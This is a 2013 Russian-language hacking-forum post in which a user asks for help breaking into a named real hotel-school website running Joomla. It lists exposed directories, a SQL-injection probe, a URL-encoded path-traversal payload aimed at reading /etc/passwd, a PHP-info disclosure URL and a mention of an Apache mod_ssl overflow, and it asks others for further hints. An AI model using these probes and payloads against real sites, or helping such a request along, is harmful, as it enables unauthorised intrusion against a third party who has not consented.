Помогите найти уязвимость в джумле

Discussion in 'Песочница' started by goot, 27 Mar 2013.

  1. goot

    goot New Member

    Joined:
    25 Mar 2013
    Messages:
    2
    Likes Received:
    1
    Reputations:
    5
    Привет Всем!
    Не могу ни как найти уязвимость http://www.swiss-hotel-school.com/

    Что нашел!
    1) доступные директории
    /cache/
    /templates/rt_cerulean/css-compiled/
    /images/youtube/
    /plugins/content/jw_allvideos/
    /plugins/content/jw_allvideos/jw_allvideos/
    /plugins/content/jw_allvideos/jw_allvideos/tmpl/
    /plugins/content/jw_allvideos/jw_allvideos/tmpl/Classic/
    /plugins/content/jw_allvideos/jw_allvideos/includes/
    /plugins/content/jw_allvideos/jw_allvideos/includes/js/

    2) Попытки sql
    http://swiss-hotel-school.com/?format=feed&type=1'
    выдает ошибку дальше развить не могу

    3) Просканировал

    http://swiss-hotel-school.com/index.php?option=com_content&view=article&id=2:школа-bhms&catid=8&Itemid=115&tmpl=component&print=1&layout=default&page=%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd%00
    но код не выводит

    неизвестная ошибка скрипта
    http://swiss-hotel-school.com/index.php?option=com_content&view=1'&id=2:школа-bhms&catid=8&Itemid=115&tmpl=component&print=1&layout=default&page=


    Обнаружено переполнение буфера в mod_ssl web сервера Apache.

    в rewrite_command для mod_ssl позволяет атакующему, который имеет привилегии на запись в каталог .htaccess

    Subject-DN в клиентском сертификате, который передается к функции ssl_util_uuencode_binary() в 'ssl_util.c'.

    роботекс
    http://swiss-hotel-school.com/robots.txt

    пхп сведенья
    http://swiss-hotel-school.com/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000

    Буду рад любой подсказкой
     
Loading...
Similar Threads - Помогите найти уязвимость
  1. zase
    Replies:
    1
    Views:
    3,527
  2. Shadows_God
    Replies:
    14
    Views:
    7,995